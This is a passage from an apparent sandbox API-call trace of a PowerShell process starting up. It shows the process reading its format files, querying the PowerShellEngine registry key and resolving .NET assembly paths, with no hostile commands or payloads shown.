	[0676.202] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c98b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0676.202] CoTaskMemFree (pv=0x1b7c98b0) 
	[0676.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0676.203] SetErrorMode (uMode=0x1) returned 0x1
	[0676.203] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0676.203] GetFileType (hFile=0x2f8) returned 0x1
	[0676.204] SetErrorMode (uMode=0x1) returned 0x1
	[0676.204] GetFileType (hFile=0x2f8) returned 0x1
	[0676.204] ReadFile (in: hFile=0x2f8, lpBuffer=0x32cd108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x32cd108*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0677.776] ReadFile (in: hFile=0x2f8, lpBuffer=0x32cd108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x32cd108*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0677.777] ReadFile (in: hFile=0x2f8, lpBuffer=0x32cd108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x32cd108*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0677.777] ReadFile (in: hFile=0x2f8, lpBuffer=0x32cd108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x32cd108*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0677.778] ReadFile (in: hFile=0x2f8, lpBuffer=0x32cd108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x32cd108*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0677.778] ReadFile (in: hFile=0x2f8, lpBuffer=0x32cd108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x32cd108*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0677.778] ReadFile (in: hFile=0x2f8, lpBuffer=0x32cd108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x32cd108*, lpNumberOfBytesRead=0x14d338*=0x9e2, lpOverlapped=0x0) returned 1
	[0677.779] ReadFile (in: hFile=0x2f8, lpBuffer=0x32cc652, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x32cc652*, lpNumberOfBytesRead=0x14d338*=0x0, lpOverlapped=0x0) returned 1
	[0677.779] ReadFile (in: hFile=0x2f8, lpBuffer=0x32cd108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x32cd108*, lpNumberOfBytesRead=0x14d338*=0x0, lpOverlapped=0x0) returned 1
	[0677.779] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3c8 | out: phkResult=0x14d3c8*=0x2f8) returned 0x0
	[0677.779] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d34c, lpData=0x0, lpcbData=0x14d348*=0x0 | out: lpType=0x14d34c*=0x1, lpData=0x0, lpcbData=0x14d348*=0x56) returned 0x0
	[0677.779] CoTaskMemAlloc (cb=0x5a) returned 0x1b7d2170
	[0677.779] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d31c, lpData=0x1b7d2170, lpcbData=0x14d318*=0x56 | out: lpType=0x14d31c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d318*=0x56) returned 0x0
	[0677.780] CoTaskMemFree (pv=0x1b7d2170) 
	[0677.780] RegCloseKey (hKey=0x2f8) returned 0x0
	[0677.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0677.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0677.790] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xcc43a1f, Data2=0xa03, Data3=0x4f9d, Data4=([0]=0xaa, [1]=0xe6, [2]=0x91, [3]=0xec, [4]=0x78, [5]=0x32, [6]=0xe7, [7]=0x98))) returned 0x0
	[0677.805] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x229d8f79, Data2=0x7e23, Data3=0x4b34, Data4=([0]=0x8a, [1]=0x31, [2]=0x62, [3]=0x84, [4]=0xd3, [5]=0xe8, [6]=0x59, [7]=0x3d))) returned 0x0
	[0677.807] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0677.807] GetFileType (hFile=0x2f8) returned 0x1
	[0677.807] SetErrorMode (uMode=0x1) returned 0x1
	[0677.807] GetFileType (hFile=0x2f8) returned 0x1
	[0677.808] ReadFile (in: hFile=0x2f8, lpBuffer=0x32f7c70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x32f7c70*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0677.809] ReadFile (in: hFile=0x2f8, lpBuffer=0x32f7c70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x32f7c70*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0679.727] ReadFile (in: hFile=0x2f8, lpBuffer=0x32f7c70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x32f7c70*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0679.727] ReadFile (in: hFile=0x2f8, lpBuffer=0x32f7c70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x32f7c70*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0679.728] ReadFile (in: hFile=0x2f8, lpBuffer=0x32f7c70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x32f7c70*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0679.729] ReadFile (in: hFile=0x2f8, lpBuffer=0x32f7c70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x32f7c70*, lpNumberOfBytesRead=0x14d338*=0xfb2, lpOverlapped=0x0) returned 1
	[0679.729] ReadFile (in: hFile=0x2f8, lpBuffer=0x32f738a, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x32f738a*, lpNumberOfBytesRead=0x14d338*=0x0, lpOverlapped=0x0) returned 1
	[0679.730] ReadFile (in: hFile=0x2f8, lpBuffer=0x32f7c70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x32f7c70*, lpNumberOfBytesRead=0x14d338*=0x0, lpOverlapped=0x0) returned 1
	[0679.730] CloseHandle (hObject=0x2f8) returned 1
	[0679.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0679.730] SetErrorMode (uMode=0x1) returned 0x1
	[0679.730] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d2e0 | out: lpFileInformation=0x14d2e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0679.730] SetErrorMode (uMode=0x1) returned 0x1
	[0679.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0679.731] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3c8 | out: phkResult=0x14d3c8*=0x2f8) returned 0x0
	[0679.731] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d34c, lpData=0x0, lpcbData=0x14d348*=0x0 | out: lpType=0x14d34c*=0x1, lpData=0x0, lpcbData=0x14d348*=0x56) returned 0x0
	[0679.731] CoTaskMemAlloc (cb=0x5a) returned 0x1b7d2170
	[0679.731] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d31c, lpData=0x1b7d2170, lpcbData=0x14d318*=0x56 | out: lpType=0x14d31c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d318*=0x56) returned 0x0
	[0679.731] CoTaskMemFree (pv=0x1b7d2170) 
	[0679.731] RegCloseKey (hKey=0x2f8) returned 0x0
	[0679.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0679.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0679.734] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xb5e33114, Data2=0x528e, Data3=0x45d3, Data4=([0]=0xb6, [1]=0xb5, [2]=0xeb, [3]=0x10, [4]=0x19, [5]=0x16, [6]=0xc1, [7]=0x94))) returned 0x0
	[0679.736] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x2081cf38, Data2=0xe283, Data3=0x478c, Data4=([0]=0x86, [1]=0x60, [2]=0x3e, [3]=0x1e, [4]=0xe9, [5]=0x66, [6]=0xfd, [7]=0xc1))) returned 0x0
	[0679.737] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xfcfa7d65, Data2=0xed36, Data3=0x4632, Data4=([0]=0xa3, [1]=0x8a, [2]=0x41, [3]=0x2e, [4]=0x46, [5]=0x4d, [6]=0xe5, [7]=0x9))) returned 0x0
	[0679.738] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xd839ee40, Data2=0x5367, Data3=0x471c, Data4=([0]=0x95, [1]=0xb8, [2]=0x0, [3]=0xa, [4]=0x40, [5]=0xef, [6]=0x98, [7]=0x61))) returned 0x0
	[0679.739] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x82ed2bd, Data2=0x158f, Data3=0x44b2, Data4=([0]=0x9f, [1]=0x1, [2]=0x4a, [3]=0xeb, [4]=0x4, [5]=0xe1, [6]=0x57, [7]=0x7e))) returned 0x0
	[0679.739] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x61352298, Data2=0x940d, Data3=0x4d92, Data4=([0]=0x88, [1]=0xea, [2]=0xfa, [3]=0x60, [4]=0xf2, [5]=0x11, [6]=0xad, [7]=0x68))) returned 0x0
	[0679.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0679.741] SetErrorMode (uMode=0x1) returned 0x1
	[0679.741] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0679.741] GetFileType (hFile=0x2f8) returned 0x1
	[0679.741] SetErrorMode (uMode=0x1) returned 0x1
	[0679.741] GetFileType (hFile=0x2f8) returned 0x1
	[0679.741] ReadFile (in: hFile=0x2f8, lpBuffer=0x33439d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x33439d0*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0679.743] ReadFile (in: hFile=0x2f8, lpBuffer=0x33439d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x33439d0*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0679.744] ReadFile (in: hFile=0x2f8, lpBuffer=0x33439d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x33439d0*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0679.744] ReadFile (in: hFile=0x2f8, lpBuffer=0x33439d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x33439d0*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0679.745] ReadFile (in: hFile=0x2f8, lpBuffer=0x33439d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x33439d0*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0679.746] ReadFile (in: hFile=0x2f8, lpBuffer=0x33439d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x33439d0*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0679.746] ReadFile (in: hFile=0x2f8, lpBuffer=0x33439d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x33439d0*, lpNumberOfBytesRead=0x14d338*=0xaca, lpOverlapped=0x0) returned 1
	[0679.746] ReadFile (in: hFile=0x2f8, lpBuffer=0x3343002, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x3343002*, lpNumberOfBytesRead=0x14d338*=0x0, lpOverlapped=0x0) returned 1
	[0679.746] ReadFile (in: hFile=0x2f8, lpBuffer=0x33439d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x33439d0*, lpNumberOfBytesRead=0x14d338*=0x0, lpOverlapped=0x0) returned 1
	[0679.746] CloseHandle (hObject=0x2f8) returned 1
	[0679.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0679.747] SetErrorMode (uMode=0x1) returned 0x1
	[0679.747] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d2e0 | out: lpFileInformation=0x14d2e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0679.747] SetErrorMode (uMode=0x1) returned 0x1
	[0679.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0679.747] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3c8 | out: phkResult=0x14d3c8*=0x2f8) returned 0x0
	[0679.747] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d34c, lpData=0x0, lpcbData=0x14d348*=0x0 | out: lpType=0x14d34c*=0x1, lpData=0x0, lpcbData=0x14d348*=0x56) returned 0x0
	[0679.747] CoTaskMemAlloc (cb=0x5a) returned 0x1b7d2170
	[0679.747] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d31c, lpData=0x1b7d2170, lpcbData=0x14d318*=0x56 | out: lpType=0x14d31c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d318*=0x56) returned 0x0
	[0679.748] CoTaskMemFree (pv=0x1b7d2170) 
	[0679.748] RegCloseKey (hKey=0x2f8) returned 0x0
	[0679.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0679.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0685.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0685.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0685.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0685.617] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0685.618] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0685.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0685.622] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0685.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0687.387] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0687.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0687.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0687.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0687.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0687.395] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0687.397] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0687.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0687.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0687.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
